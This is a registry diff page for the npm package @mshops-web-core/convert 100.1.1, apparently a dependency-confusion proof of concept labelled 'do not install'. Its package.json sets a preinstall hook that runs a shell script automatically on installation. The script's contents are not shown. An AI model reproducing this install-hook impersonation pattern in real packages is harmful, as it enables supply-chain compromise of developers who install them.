@mshops-web-core/convert 100.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @mshops-web-core/convert might be problematic. Click here for more details.
- package/.idea/depencyConfusionPackages.iml +12 -0
- package/.idea/modules.xml +8 -0
- package/README.md +1 -0
- package/index.js +0 -0
- package/package.json +12 -0
- package/scripts/preinstall.sh +4 -0
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<module type="WEB_MODULE" version="4">
|
|
3
|
+
<component name="NewModuleRootManager">
|
|
4
|
+
<content url="file://$MODULE_DIR$">
|
|
5
|
+
<excludeFolder url="file://$MODULE_DIR$/temp" />
|
|
6
|
+
<excludeFolder url="file://$MODULE_DIR$/.tmp" />
|
|
7
|
+
<excludeFolder url="file://$MODULE_DIR$/tmp" />
|
|
8
|
+
</content>
|
|
9
|
+
<orderEntry type="inheritedJdk" />
|
|
10
|
+
<orderEntry type="sourceFolder" forTests="false" />
|
|
11
|
+
</component>
|
|
12
|
+
</module>
|
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
<?xml version="1.0" encoding="UTF-8"?>
|
|
2
|
+
<project version="4">
|
|
3
|
+
<component name="ProjectModuleManager">
|
|
4
|
+
<modules>
|
|
5
|
+
<module fileurl="file://$PROJECT_DIR$/.idea/depencyConfusionPackages.iml" filepath="$PROJECT_DIR$/.idea/depencyConfusionPackages.iml" />
|
|
6
|
+
</modules>
|
|
7
|
+
</component>
|
|
8
|
+
</project>
|
package/README.md
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
PLEASE DO NOT INSTALL THIS PACKAGE IS A SECURITY RESEARCH PROOF OF CONCEPT
|
package/index.js
ADDED
|
File without changes
|
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@mshops-web-core/convert",
|
|
3
|
+
"version": "100.1.1",
|
|
4
|
+
"description": "THIS IS A PROOF OF CONCEPT DO NOT INSTALL",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "/bin/bash scripts/preinstall.sh"
|
|
9
|
+
},
|
|
10
|
+
"author": "xpl0ited1",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|